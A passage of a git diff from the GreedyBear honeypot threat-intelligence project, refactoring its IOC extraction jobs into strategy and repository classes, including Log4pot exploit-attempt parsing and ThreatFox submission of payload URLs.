+from greedybear.cronjobs.extraction.utils import iocs_from_hits, threatfox_submission
+
+
+class GenericExtractionStrategy(BaseExtractionStrategy):
+    """
+    Extraction strategy for generic honeypots.
+
+    Processes log hits as scanner-type IOCs and submits qualifying
+    records to ThreatFox. Used for honeypots without specialized
+    extraction logic.
+    """
+
+    def extract_from_hits(self, hits: list[dict]) -> None:
+        """
+        Extract IOCs from honeypot log hits.
+        Converts hits to IOC records, persists them via the IOC processor,
+        and submits qualifying records to ThreatFox.
+
+        Args:
+            hits: List of Elasticsearch hits to process.
+        """
+        for ioc in iocs_from_hits(hits):
+            self.log.info(f"IoC {ioc.name} found by honeypot {self.honeypot}")
+            ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name=self.honeypot)
+            if ioc_record:
+                self.ioc_records.append(ioc_record)
+                threatfox_submission(ioc_record, ioc.related_urls, self.log)
+        self.log.info(f"added {len(self.ioc_records)} IoCs from {self.honeypot}")
diff --git a/greedybear/cronjobs/log4pot.py b/greedybear/cronjobs/extraction/strategies/log4pot.py
similarity index 66%
rename from greedybear/cronjobs/log4pot.py
rename to greedybear/cronjobs/extraction/strategies/log4pot.py
index 3fde6cce..3d0e8c4f 100644
--- a/greedybear/cronjobs/log4pot.py
+++ b/greedybear/cronjobs/extraction/strategies/log4pot.py
@@ -2,26 +2,36 @@
 # See the file 'LICENSE' for copying permission.
 import base64
 import re
+from typing import Optional
 from urllib.parse import urlparse
 
 from greedybear.consts import PAYLOAD_REQUEST, SCANNER
-from greedybear.cronjobs.attacks import ExtractAttacks
-from greedybear.cronjobs.honeypots import Honeypot
+from greedybear.cronjobs.extraction.strategies import BaseExtractionStrategy
+from greedybear.cronjobs.extraction.utils import get_ioc_type
+from greedybear.cronjobs.repositories import IocRepository, SensorRepository
 from greedybear.models import IOC
 from greedybear.regex import REGEX_CVE_BASE64COMMAND, REGEX_CVE_URL, REGEX_URL
 
 
-class ExtractLog4Pot(ExtractAttacks):
-    def __init__(self, minutes_back=None):
-        super().__init__(minutes_back=minutes_back)
-        self.log4pot = Honeypot("Log4pot")
+class Log4potExtractionStrategy(BaseExtractionStrategy):
+    """
+    Extraction strategy for Log4pot honeypot (CVE-2021-44228).
+    Extracts scanner IPs, payload URLs from JNDI/LDAP exploit attempts,
+    and hidden URLs from base64-encoded commands. Links related IOCs
+    (scanners to payload hosts) via foreign key relationships.
+    """
 
-    def _log4pot_lookup(self):
-        search = self._base_search(self.log4pot)
+    def __init__(
+        self,
+        honeypot: str,
+        ioc_repo: IocRepository,
+        sensor_repo: SensorRepository,
+    ):
+        super().__init__(honeypot, ioc_repo, sensor_repo)
+
+    def extract_from_hits(self, hits: list[dict]) -> None:
         # we want to get only probes that tried to exploit the specific log4j CVE
-        search = search.filter("term", reason="exploit")
-        search = search.source(["deobfuscated_payload", "correlation_id"])
-        hits = search[:10000].execute()
+        hits = [hit for hit in hits if hit.get("reason", "") == "exploit"]
 
         url = None
         hostname = None
@@ -32,9 +42,9 @@ def _log4pot_lookup(self):
         added_hidden_payloads = 0
 
         for hit in hits:
-            scanner_ip = self._get_scanner_ip(hit.correlation_id)
+            scanner_ip = self._get_scanner_ip(hit["correlation_id"], hits)
 
-            match = re.search(REGEX_CVE_URL, hit.deobfuscated_payload)
+            match = re.search(REGEX_CVE_URL, hit["deobfuscated_payload"])
             if match:
                 # we are losing the protocol but that's ok for now
                 url = match.group()
@@ -48,7 +58,7 @@ def _log4pot_lookup(self):
 
             # it is possible to extract another payload from base64 encoded string.
             # this is a behavior related to the attack that leverages LDAP
-            match_command = re.search(REGEX_CVE_BASE64COMMAND, hit.deobfuscated_payload)
+            match_command = re.search(REGEX_CVE_BASE64COMMAND, hit["deobfuscated_payload"])
             if match_command:
                 # we are losing the protocol but that's ok for now
                 base64_encoded = match_command.group(1)
@@ -71,8 +81,8 @@ def _log4pot_lookup(self):
 
             # add scanner
             if scanner_ip:
-                ioc = IOC(name=scanner_ip, type=self._get_ioc_type(scanner_ip), log4j=True)
-                self._add_ioc(ioc, attack_type=SCANNER)
+                ioc = IOC(name=scanner_ip, type=get_ioc_type(scanner_ip), log4j=True)
+                self.ioc_processor.add_ioc(ioc, attack_type=SCANNER)
                 added_scanners += 1
 
             # add first URL
@@ -80,11 +90,11 @@ def _log4pot_lookup(self):
                 related_urls = [url] if url else []
                 ioc = IOC(
                     name=scanner_ip,
-                    type=self._get_ioc_type(scanner_ip),
+                    type=get_ioc_type(scanner_ip),
                     log4j=True,
                     related_urls=related_urls,
                 )
-                self._add_ioc(ioc, attack_type=SCANNER)
+                self.ioc_processor.add_ioc(ioc, attack_type=SCANNER)
                 added_payloads += 1
 
             # add hidden URL
@@ -92,11 +102,11 @@ def _log4pot_lookup(self):
                 related_urls = [hidden_url] if hidden_url else []
                 ioc = IOC(
                     name=hostname,
-                    type=self._get_ioc_type(hostname),
+                    type=get_ioc_type(hostname),
                     log4j=True,
                     related_urls=related_urls,
                 )
-                self._add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
+                self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
                 added_hidden_payloads += 1
 
             # once all have added, we can add the foreign keys
@@ -104,55 +114,40 @@ def _log4pot_lookup(self):
 
         self.log.info(f"added {added_scanners} scanners, {added_payloads}" f" payloads" f" and {added_hidden_payloads} hidden payloads")
 
-    def _add_fks(self, scanner_ip, hostname, hidden_hostname):
+    def _add_fks(self, scanner_ip: str, hostname: str, hidden_hostname: str) -> None:
         self.log.info(f"adding foreign keys for the following iocs: {scanner_ip}, {hostname}, {hidden_hostname}")
-        scanner_ip_instance = IOC.objects.filter(name=scanner_ip).first()
-        hostname_instance = IOC.objects.filter(name=hostname).first()
-        hidden_hostname_instance = IOC.objects.filter(name=hidden_hostname).first()
+        scanner_ip_instance = self.ioc_repo.get_ioc_by_name(scanner_ip)
+        hostname_instance = self.ioc_repo.get_ioc_by_name(hostname)
+        hidden_hostname_instance = self.ioc_repo.get_ioc_by_name(hidden_hostname)
 
-        if scanner_ip_instance:
+        if scanner_ip_instance is not None:
             if hostname_instance and hostname_instance not in scanner_ip_instance.related_ioc.all():
                 scanner_ip_instance.related_ioc.add(hostname_instance)
             if hidden_hostname_instance and hidden_hostname_instance not in scanner_ip_instance.related_ioc.all():
                 scanner_ip_instance.related_ioc.add(hidden_hostname_instance)
-            scanner_ip_instance.save()
+            self.ioc_repo.save(scanner_ip_instance)
 
-        if hostname_instance:
+        if hostname_instance is not None:
             if scanner_ip_instance and scanner_ip_instance not in hostname_instance.related_ioc.all():
                 hostname_instance.related_ioc.add(scanner_ip_instance)
             if hidden_hostname_instance and hidden_hostname_instance not in hostname_instance.related_ioc.all():
                 hostname_instance.related_ioc.add(hidden_hostname_instance)
-            hostname_instance.save()
+            self.ioc_repo.save(hostname_instance)
 
-        if hidden_hostname_instance:
+        if hidden_hostname_instance is not None:
             if hostname_instance and hostname_instance not in hidden_hostname_instance.related_ioc.all():
                 hidden_hostname_instance.related_ioc.add(hostname_instance)
             if scanner_ip_instance and scanner_ip_instance not in hidden_hostname_instance.related_ioc.all():
                 hidden_hostname_instance.related_ioc.add(scanner_ip_instance)
-            hidden_hostname_instance.save()
+            self.ioc_repo.save(hidden_hostname_instance)
 
-    def _get_scanner_ip(self, correlation_id):
+    def _get_scanner_ip(self, correlation_id: str, hits: list[dict]) -> Optional[str]:
         self.log.info(f"extracting scanner IP from correlation_id {correlation_id}")
-        scanner_ip = None
-        search = self._base_search(self.log4pot)
-        search = search.filter("term", **{"correlation_id.keyword": str(correlation_id)})
-        search = search.filter("term", reason="request")
-        search = search.source(["src_ip"])
-        # only one should be available
-        hits = search[:10].execute()
-        for hit in hits:
-            scanner_ip = hit.src_ip
-            break
+        filtered_hits = [hit for hit in hits if str(hit.get("correlation_id", "")) == str(correlation_id) and hit.get("reason", "") == "request"]
 
-        if scanner_ip:
-            self.log.info(f"extracted scanner IP {scanner_ip} from correlation_id {correlation_id}")
-        else:
+        if not filtered_hits:
             self.log.warning(f"scanner IP was not extracted from correlation_id {correlation_id}")
-
+            return None
+        scanner_ip = filtered_hits[0]["src_ip"]
+        self.log.info(f"extracted scanner IP {scanner_ip} from correlation_id {correlation_id}")
         return scanner_ip
-
-    def run(self):
-        self._healthcheck()
-        self._check_first_time_run("log4j")
-        self._log4pot_lookup()
-        self._update_scores()
diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
new file mode 100644
index 00000000..9784ecbf
--- /dev/null
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -0,0 +1,172 @@
+from collections import defaultdict
+from datetime import datetime
+from ipaddress import IPv4Address, ip_address
+from logging import Logger
+from urllib.parse import urlparse
+
+import requests
+from django.conf import settings
+from greedybear.consts import DOMAIN, IP
+from greedybear.models import IOC, MassScanners, WhatsMyIP
+
+
+def is_whatsmyip_domain(domain: str) -> bool:
+    """
+    Check if a domain is a known "what's my IP" service.
+
+    Args:
+        domain: Domain name to check.
+
+    Returns:
+        True if the domain is in the WhatsMyIP list, False otherwise.
+    """
+    try:
+        WhatsMyIP.objects.get(domain=domain)
+    except WhatsMyIP.DoesNotExist:
+        return False
+    return True
+
+
+def correct_ip_reputation(ip: str, ip_reputation: str) -> str:
+    """
+    Correct IP reputation based on mass scanner database.
+    Overrides reputation to "mass scanner" if the IP is found in the MassScanners table.
+    This is necessary because we have seen "mass scanners" incorrectly flagged.
+
+    Args:
+        ip: IP address to check.
+        ip_reputation: Current reputation string.
+
+    Returns:
+        Corrected reputation string.
+    """
+    if not ip_reputation or ip_reputation == "known attacker":
+        try:
+            MassScanners.objects.get(ip_address=ip)
+        except MassScanners.DoesNotExist:
+            pass
+        else:
+            ip_reputation = "mass scanner"
+    return ip_reputation
+
+
+def iocs_from_hits(hits: list[dict]) -> list[IOC]:
+    """
+    Convert Elasticsearch hits into IOC objects.
+    Groups hits by source IP, filters out non-global addresses, and
+    constructs IOC objects with aggregated data.
+
+    Args:
+        hits: List of Elasticsearch hit dictionaries.
+
+    Returns:
+        List of IOC instances, one per unique source IP.
+    """
+    hits_by_ip = defaultdict(list)
+    for hit in hits:
+        hits_by_ip[hit["src_ip"]].append(hit)
+    iocs = []
+    for ip, hits in hits_by_ip.items():
+        dest_ports = [hit["dest_port"] for hit in hits if "dest_port" in hit]
+        extracted_ip = ip_address(ip)
+        if extracted_ip.is_loopback or extracted_ip.is_private or extracted_ip.is_multicast or extracted_ip.is_link_local or extracted_ip.is_reserved:
+            continue
+
+        ioc = IOC(
+            name=ip,
+            type=get_ioc_type(ip),
+            interaction_count=len(hits),
+            ip_reputation=correct_ip_reputation(ip, hits[0].get("ip_rep", "")),
+            asn=hits[0].get("geoip", {}).get("asn"),
+            destination_ports=sorted(set(dest_ports)),
+            login_attempts=len(hits) if hits[0].get("type", "") == "Heralding" else 0,
+        )
+        timestamps = [hit["@timestamp"] for hit in hits if "@timestamp" in hit]
+        if timestamps:
+            ioc.first_seen = datetime.fromisoformat(min(timestamps))
+            ioc.last_seen = datetime.fromisoformat(max(timestamps))
+        iocs.append(ioc)
+    return iocs
+
+
+def get_ioc_type(ioc: str) -> str:
+    """
+    Determine the type of an IOC based on its format.
+
+    Args:
+        ioc: IOC name string (IP address or domain).
+
+    Returns:
+        IP if the value is a valid IPv4 address, DOMAIN otherwise.
+    """
+    try:
+        IPv4Address(ioc)
+    except ValueError:
+        ioc_type = DOMAIN
+    else:
+        ioc_type = IP
+    return ioc_type
+
+
+def threatfox_submission(ioc_record: IOC, related_urls: list, log: Logger) -> None:
+    """
+    Submit IOC URLs to ThreatFox threat intelligence platform.
+    Only submits payload request IOCs with URLs containing paths,
+    because they are more reliable than scanners.
+    Requires THREATFOX_API_KEY to be configured in settings.
+
+    Args:
+        ioc_record: IOC record containing honeypot associations.
+        related_urls: List of URLs to potentially submit.
+        log: Logger instance for status messages.
+    """
+    if not ioc_record.payload_request:
+        return
+
+    if not settings.THREATFOX_API_KEY:
+        log.warning("Threatfox API Key not available")
+        return
+
+    urls_to_submit = []
+    # submit only URLs with paths to avoid false positives
+    for related_url in related_urls:
+        parsed_url = urlparse(related_url)
+        if parsed_url.path not in ["", "/"]:
+            urls_to_submit.append(related_url)
+        else:
+            log.info(f"skipping export of {related_url} cause has no path")
+
+    if not urls_to_submit:
+        log.info("No URLs with paths to submit")
+        return
+
+    headers = {"Auth-Key": settings.THREATFOX_API_KEY}
+    log.info(f"submitting IOC {urls_to_submit} to Threatfox")
+
+    seen_honeypots = []
+    if ioc_record.cowrie:
+        seen_honeypots.append("cowrie")
+    if ioc_record.log4j:
+        seen_honeypots.append("log4pot")
+    for honeypot in ioc_record.general_honeypot.all():
+        seen_honeypots.append(honeypot.name)
+    seen_honeypots_str = ", ".join(seen_honeypots)
+
+    json_data = {
+        "query": "submit_ioc",
+        "threat_type": "payload_delivery",
+        "ioc_type": "url",
+        "malware": "unknown",
+        "confidence_level": "75",
+        "reference": "https://greedybear.honeynet.org",
+        "comment": f"Seen requesting a payload from {seen_honeypots_str} honeypot and collected in Greedybear, the Threat Intel Platform for T-POTs.",
+        "anonymous": 0,
+        "tags": ["honeypot"],
+        "iocs": urls_to_submit,
+    }
+    try:
+        r = requests.post("https://threatfox-api.abuse.ch/api/v1/", headers=headers, json=json_data, timeout=5)
+    except requests.RequestException as e:
+        log.exception(f"Threatfox push error: {e}")
+    else:
+        log.info(f"Threatfox submission successful. Received response: {r.text}")
diff --git a/greedybear/cronjobs/general.py b/greedybear/cronjobs/general.py
deleted file mode 100644
index 2e33c30a..00000000
--- a/greedybear/cronjobs/general.py
+++ /dev/null
@@ -1,43 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-
-from greedybear.consts import ATTACK_DATA_FIELDS, SCANNER
-from greedybear.cronjobs.attacks import ExtractAttacks
-from greedybear.cronjobs.honeypots import Honeypot
-from greedybear.models import IOC, GeneralHoneypot
-
-
-class ExtractGeneral(ExtractAttacks):
-    def __init__(self, honeypot, minutes_back=None):
-        super().__init__(minutes_back=minutes_back)
-        self.hp = honeypot
-        self.added_scanners = 0
-
-    def _general_lookup(self):
-        self._get_scanners()
-        self.log.info(f"added {self.added_scanners} scanners for {self.hp.name}")
-
-    def _get_scanners(self):
-        honeypot_name = self.hp.name
-        for ioc in self._get_attacker_data(self.hp, ATTACK_DATA_FIELDS):
-            self.log.info(f"found IP {ioc.name} by honeypot {honeypot_name}")
-            self._add_ioc(ioc, attack_type=SCANNER, general=honeypot_name)
-            self.added_scanners += 1
-
-    def run(self):
-        self._healthcheck()
-        self._check_first_time_run(self.hp.name.lower(), general=True)
-        self._general_lookup()
-        return self.ioc_records
-
-
-class ExtractAllGenerals(ExtractAttacks):
-    def __init__(self, minutes_back=None):
-        super().__init__(minutes_back=minutes_back)
-        self.honeypots = [Honeypot(hp.name) for hp in GeneralHoneypot.objects.all().filter(active=True)]
-
-    def run(self):
-        for honeypot in self.honeypots:
-            iocs = ExtractGeneral(honeypot, self.minutes_back).run()
-            self.ioc_records.extend(iocs)
-        self._update_scores()
diff --git a/greedybear/cronjobs/honeypots.py b/greedybear/cronjobs/honeypots.py
deleted file mode 100644
index 1b006081..00000000
--- a/greedybear/cronjobs/honeypots.py
+++ /dev/null
@@ -1,9 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-from dataclasses import dataclass
-
-
-@dataclass
-class Honeypot:
-    name: str
-    description: str = ""
diff --git a/greedybear/cronjobs/repositories/__init__.py b/greedybear/cronjobs/repositories/__init__.py
new file mode 100644
index 00000000..1302c3b7
--- /dev/null
+++ b/greedybear/cronjobs/repositories/__init__.py
@@ -0,0 +1,4 @@
+from greedybear.cronjobs.repositories.cowrie_session import *
+from greedybear.cronjobs.repositories.elastic import *
+from greedybear.cronjobs.repositories.ioc import *
+from greedybear.cronjobs.repositories.sensor import *
diff --git a/greedybear/cronjobs/repositories/cowrie_session.py b/greedybear/cronjobs/repositories/cowrie_session.py
new file mode 100644
index 00000000..be7dc13e
--- /dev/null
+++ b/greedybear/cronjobs/repositories/cowrie_session.py
@@ -0,0 +1,76 @@
+import logging
+from typing import Optional
+
+from greedybear.models import IOC, CommandSequence, CowrieSession
+
+
+class CowrieSessionRepository:
+    """
+    Repository for data access to Cowrie sessions and command sequences.
+    """
+
+    def __init__(self):
+        self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+
+    def get_or_create_session(self, session_id: str, source: IOC) -> CowrieSession:
+        """
+        Retrieve an existing session or create a new one.
+
+        Args:
+            session_id: Cowrie session ID as a hexadecimal string.
+            source: IOC instance to associate with a new session.
+
+        Returns:
+            The existing or newly created CowrieSession.
+
+        Raises:
+            ValueError: If session_id is not a valid hexadecimal string.
+        """
+        try:
+            pk = int(session_id, 16)
+        except ValueError:
+            raise ValueError(f"session_id must be a valid hex string, got: {session_id!r}")
+        record, created = CowrieSession.objects.get_or_create(session_id=pk, defaults={"source": source})
+        self.log.debug(f"created new session {session_id}" if created else f"{session_id} already exists")
+        return record
+
+    def get_command_sequence_by_hash(self, commands_hash: str) -> Optional[CommandSequence]:
+        """
+        Retrieve a command sequence by its hash.
+
+        Args:
+            commands_hash: SHA256 hash identifying the command sequence.
+
+        Returns:
+            The matching CommandSequence, or None if not found.
+        """
+        try:
+            return CommandSequence.objects.get(commands_hash=commands_hash)
+        except CommandSequence.DoesNotExist:
+            return None
+
+    def save_session(self, session: CowrieSession) -> CowrieSession:
+        """
+        Persist a CowrieSession to the database.
+
+        Args:
+            session: The CowrieSession instance to save.
+
+        Returns:
+            The saved CowrieSession instance.
+        """
+        session.save()
+        return session
+
+    def save_command_sequence(self, cmd: CommandSequence) -> CommandSequence:
+        """
+        Persist a CommandSequence to the database.
+
+        Args:
+            cmd: The CommandSequence instance to save.
+
+        Returns:
+            The saved CommandSequence instance.
+        """
+        cmd.save()
+        return cmd
diff --git a/greedybear/cronjobs/repositories/elastic.py b/greedybear/cronjobs/repositories/elastic.py
new file mode 100644
index 00000000..ac4ac216
--- /dev/null
+++ b/greedybear/cronjobs/repositories/elastic.py
@@ -0,0 +1,119 @@
+import logging
+from datetime import datetime, timedelta
+
+from django.conf import settings
+from elasticsearch8.dsl import Q, Search
+from greedybear.consts import REQUIRED_FIELDS
+from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
+
+
+class ElasticRepository:
+    """
+    Repository for querying honeypot log data from a T-Pot Elasticsearch instance.
+
+    Provides a cached search interface for retrieving log entries within
+    a specified time window from logstash indices.
+
+    This class is intended for individual extraction runs, so the cache never clears.
+    """
+
+    class ElasticServerDownException(Exception):
+        """Raised when the Elasticsearch server is unreachable."""
+
+        pass
+
+    def __init__(self):
+        """Initialize the repository with an Elasticsearch client and empty cache."""
+        self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+        self.elastic_client = settings.ELASTIC_CLIENT
+        self.search_cache = dict()
+
+    def search(self, minutes_back_to_lookup: int):
+        """
+        Search for log entries within a specified time window.
+
+        Returns cached results if available for the given lookback period.
+        Uses legacy or modern query format based on LEGACY_EXTRACTION setting.
+
+        Args:
+            minutes_back_to_lookup: Number of minutes to look back from the current time.
+
+        Returns:
+            list: Log entries sorted by @timestamp, containing only REQUIRED_FIELDS.
+
+        Raises:
+            ElasticServerDownException: If Elasticsearch is unreachable.
+        """
+        if minutes_back_to_lookup in self.search_cache:
+            self.log.debug("fetching elastic search result from cache")
+            return self.search_cache[minutes_back_to_lookup]
+
+        self._healthcheck()
+        search = Search(using=self.elastic_client, index="logstash-*")
+        self.log.debug(f"minutes_back_to_lookup: {minutes_back_to_lookup}")
+        if LEGACY_EXTRACTION:
+            self.log.debug("querying elastic using legacy method")
+            gte_date = f"now-{minutes_back_to_lookup}m/m"
+            q = Q(
+                "bool",
+                should=[
+                    Q("range", timestamp={"gte": gte_date, "lte": "now/m"}),
+                    Q("range", end_time={"gte": gte_date, "lte": "now/m"}),
+                    Q("range", **{"@timestamp": {"gte": gte_date, "lte": "now/m"}}),
+                ],
+                minimum_should_match=1,
+            )
+        else:
+            self.log.debug("querying elastic using standard method")
+            window_start, window_end = get_time_window(datetime.now(), minutes_back_to_lookup)
+            self.log.debug(f"time window: {window_start} - {window_end}")
+            q = Q("range", **{"@timestamp": {"gte": window_start, "lt": window_end}})
+
+        search = search.query(q)
+        search.source(REQUIRED_FIELDS)
+        result = list(search.scan())
+        self.log.debug(f"found {len(result)} hits")
+
+        result.sort(key=lambda hit: hit["@timestamp"])
+        self.search_cache[minutes_back_to_lookup] = result
+        return result
+
+    def _healthcheck(self):
+        """
+        Verify Elasticsearch connectivity.
+
+        Raises:
+            ElasticServerDownException: If the server does not respond to ping.
+        """
+        self.log.debug("performing healthcheck")
+        if not self.elastic_client.ping():
+            raise self.ElasticServerDownException("elastic server is not reachable, could be down")
+        self.log.debug("elastic server is reachable")
+
+
+def get_time_window(reference_time: datetime, lookback_minutes: int, extraction_interval: int = EXTRACTION_INTERVAL) -> tuple[datetime, datetime]:
+    """
+    Calculates a time window that ends at the last completed extraction interval and looks back a specified number of minutes.
+
+    Args:
+        reference_time (datetime): Reference point in time
+        lookback_minutes (int): Minutes to look back
+        extraction_interval (int): Minutes between two subsequent extraction runs
+
+    Returns:
+        tuple: A tuple containing the start and end time of the time window as datetime objects
+
+    Raises:
+        ValueError: If lookback_minutes is less than extraction_interval
+        ValueError: If extraction_interval is not a positive divisor of 60
+    """
+    if extraction_interval <= 0 or 60 % extraction_interval > 0:
+        raise ValueError("Argument extraction_interval must be a positive divisor of 60.")
+
+    if lookback_minutes < extraction_interval:
+        raise ValueError(f"Argument lookback_minutes size must be at least {extraction_interval} minutes.")
+
+    rounded_minute = (reference_time.minute // extraction_interval) * extraction_interval
+    window_end = reference_time.replace(minute=rounded_minute, second=0, microsecond=0)
+    window_start = window_end - timedelta(minutes=lookback_minutes)
+    return (window_start, window_end)
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
new file mode 100644
index 00000000..8af85691
--- /dev/null
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -0,0 +1,136 @@
+import logging
+from typing import Optional
+
+from greedybear.models import IOC, GeneralHoneypot
+
+
+class IocRepository:
+    """
+    Repository for IOC and honeypot data access with honeypot caching.
+
+    Maintains a cache of existing honeypot names, populated at initialization
+    and updated when new honeypots are created.
+    """
+
+    SPECIAL_HONEYPOTS = frozenset({"Cowrie", "Log4pot"})
+
+    def __init__(self):
+        """Initialize the repository and populate the honeypot cache from the database."""
+        self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+        self._honeypot_cache = {hp.name: hp.active for hp in GeneralHoneypot.objects.all()}
+        self._honeypot_cache.update({name: True for name in self.SPECIAL_HONEYPOTS})
+
+    def add_honeypot_to_ioc(self, honeypot_name: str, ioc: IOC) -> IOC:
+        """
+        Associate a honeypot with an IOC.
+
+        Args:
+            honeypot_name: Name of the honeypot to associate.
+            ioc: IOC instance to add the honeypot to.
+
+        Returns:
+            The updated IOC instance.
+        """
+        honeypot_set = {hp.name for hp in ioc.general_honeypot.all()}
+        if honeypot_name not in honeypot_set:
+            self.log.debug(f"adding honeypot {honeypot_name} to IoC {ioc}")
+            honeypot = self.get_hp_by_name(honeypot_name)
+            ioc.general_honeypot.add(honeypot)
+        return ioc
+
+    def create_honeypot(self, honeypot_name: str) -> GeneralHoneypot:
+        """
+        Create a new honeypot and save it to the database.
+
+        Args:
+            honeypot_name: Name for the new honeypot.
+
+        Returns:
+            The newly created GeneralHoneypot instance.
+        """
+        self.log.debug(f"creating honeypot {honeypot_name}")
+        honeypot = GeneralHoneypot(name=honeypot_name, active=True)
+        honeypot.save()
+        self._honeypot_cache[honeypot_name] = True
+        return honeypot
+
+    def get_ioc_by_name(self, name: str) -> Optional[IOC]:
+        """
+        Retrieve an IOC by its name.
+
+        Args:
+            name: The IOC name to look up.
+
+        Returns:
+            The matching IOC, or None if not found.
+        """
+        try:
+            return IOC.objects.get(name=name)
+        except IOC.DoesNotExist:
+            return None
+
+    def get_hp_by_name(self, name: str) -> Optional[GeneralHoneypot]:
+        """
+        Retrieve a honeypot by its name.
+
+        Args:
+            name: The honeypot name to look up.
+
+        Returns:
+            The matching GeneralHoneypot, or None if not found.
+        """
+        try:
+            return GeneralHoneypot.objects.get(name=name)
+        except GeneralHoneypot.DoesNotExist:
+            return None
+
+    def is_empty(self) -> bool:
+        """
+        Check if the database holds any IOC records.
+
+        Returns:
+            True if no IOCs exist, False otherwise.
+        """
+        return not IOC.objects.exists()
+
+    def is_enabled(self, honeypot_name: str) -> bool:
+        """
+        Check if a honeypot is enabled.
+        Special honeypots (Cowrie, Log4pot) are always enabled.
+        General honeypots are enabled based on their active flag.
+
+        Args:
+            honeypot_name: Name of the honeypot to check.
+
+        Returns:
+            True if the honeypot is enabled, False otherwise.
+        """
+        return self._honeypot_cache.get(honeypot_name, False)
+
+    def is_ready_for_extraction(self, honeypot_name: str) -> bool:
+        """
+        Check if a honeypot is ready for data extraction.
+        Creates the honeypot if it doesn't exist, then checks if it's enabled.
+
+        Args:
+            honeypot_name: Name of the honeypot to check.
+
+        Returns:
+            True if the honeypot exists and is enabled, False otherwise.
+        """
+        if honeypot_name not in self._honeypot_cache:
+            self.create_honeypot(honeypot_name)
+        return self.is_enabled(honeypot_name)
+
+    def save(self, ioc: IOC) -> IOC:
+        """
+        Saves an IOC to the database.
+
+        Args:
+            ioc: The IOC instance to save.
+
+        Returns:
+            The saved IOC instance.
+        """
+        ioc.save()
+        return ioc
diff --git a/greedybear/cronjobs/repositories/sensor.py b/greedybear/cronjobs/repositories/sensor.py
new file mode 100644
index 00000000..4f722daf
--- /dev/null
+++ b/greedybear/cronjobs/repositories/sensor.py
@@ -0,0 +1,58 @@
+import logging
+
+from greedybear.consts import IP
+from greedybear.cronjobs.extraction.utils import get_ioc_type
+from greedybear.models import Sensors
+
+
+class SensorRepository:
+    """
+    Repository for data access to the set of T-Pot sensors with in-memory caching.
+
+    The cache is populated once from the database at initialization and updated
+    on successful additions.
+    """
+
+    def __init__(self):
+        """Initialize the repository and populate the cache from the database."""
+        self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+        self.cache = set()
+        self._fill_cache()
+
+    @property
+    def sensors(self) -> set:
+        """
+        Get the set of known sensor IP addresses.
+
+        Returns:
+            Set of IP address strings for all known sensors.
+        """
+        return self.cache
+
+    def add_sensor(self, ip: str) -> bool:
+        """
+        Add a new sensor IP address.
+        Validates that the IP is not already known and is a valid IP address
+        before writing it to the database and updating the cache.
+
+        Args:
+            ip: IP address string to add .
+
+        Returns:
+            True if the sensor was added, False if already known or invalid.
+        """
+        if ip in self.cache:
+            return False
+        if get_ioc_type(ip) != IP:
+            self.log.debug(f"{ip} is not an IP address - won't add as a sensor")
+            return False
+        sensor = Sensors(address=ip)
+        sensor.save()
+        self.cache.add(ip)
+        self.log.info(f"added sensor {ip} to the database")
+        return True
+
+    def _fill_cache(self) -> None:
+        """Load sensor addresses from the database into the cache."""
+        self.log.debug("populating sensor cache")
+        self.cache = {s.address for s in Sensors.objects.all()}
diff --git a/greedybear/cronjobs/sensors.py b/greedybear/cronjobs/sensors.py
deleted file mode 100644
index 281eda3d..00000000
--- a/greedybear/cronjobs/sensors.py
+++ /dev/null
@@ -1,50 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-from greedybear.cronjobs.base import ElasticJob
-from greedybear.cronjobs.honeypots import Honeypot
-from greedybear.models import Sensors
-
-
-class ExtractSensors(ElasticJob):
-    """
-    this cron is required to extract sensors IP addresses and whitelist them
-    """
-
-    def __init__(self):
-        super().__init__()
-
-    @property
-    def minutes_back_to_lookup(self):
-        return 1440  # a day
-
-    def _extract_sensors(self):
-        honeypot = Honeypot("Suricata")
-        search = self._base_search(honeypot)
-
-        added_sensors = 0
-
-        # get no more than X IPs a day
-        search.aggs.bucket(
-            "sensors_ips",
-            "terms",
-            field="t-pot_ip_ext.keyword",
-            size=1000,
-        )
-        agg_response = search[0:0].execute()
-        for tag in agg_response.aggregations.sensors_ips.buckets:
-            if not tag.key:
-                self.log.warning(f"why tag.key is empty? tag: {tag}")
-                continue
-            self.log.info(f"found IP {tag.key} by honeypot {honeypot.name}")
-            try:
-                Sensors.objects.get(address=tag.key)
-            except Sensors.DoesNotExist:
-                sensor = Sensors(address=tag.key)
-                sensor.save()
-                added_sensors += 1
-
-        self.log.info(f"added {added_sensors} new sensors in the database")
-
-    def run(self):
-        self._healthcheck()
-        self._extract_sensors()
diff --git a/greedybear/settings.py b/greedybear/settings.py
index 207515c8..565a1172 100644
--- a/greedybear/settings.py
+++ b/greedybear/settings.py
@@ -409,6 +409,7 @@
 
 LEGACY_EXTRACTION = os.environ.get("LEGACY_EXTRACTION", "False") == "True"
 EXTRACTION_INTERVAL = int(os.environ.get("EXTRACTION_INTERVAL", 10))
+INITIAL_EXTRACTION_TIMESPAN = int(os.environ.get("INITIAL_EXTRACTION_TIMESPAN", 60 * 24 * 3))  # 3 days
 CLUSTER_COWRIE_COMMAND_SEQUENCES = os.environ.get("CLUSTER_COWRIE_COMMAND_SEQUENCES", "False") == "True"
 
 IOC_RETENTION = int(os.environ.get("IOC_RETENTION", "3650"))
diff --git a/greedybear/tasks.py b/greedybear/tasks.py
index 37ac9fb1..8b652e24 100644
--- a/greedybear/tasks.py
+++ b/greedybear/tasks.py
@@ -2,37 +2,15 @@
 # See the file 'LICENSE' for copying permission.
 from __future__ import absolute_import, unicode_literals
 
-from celery import chain, shared_task
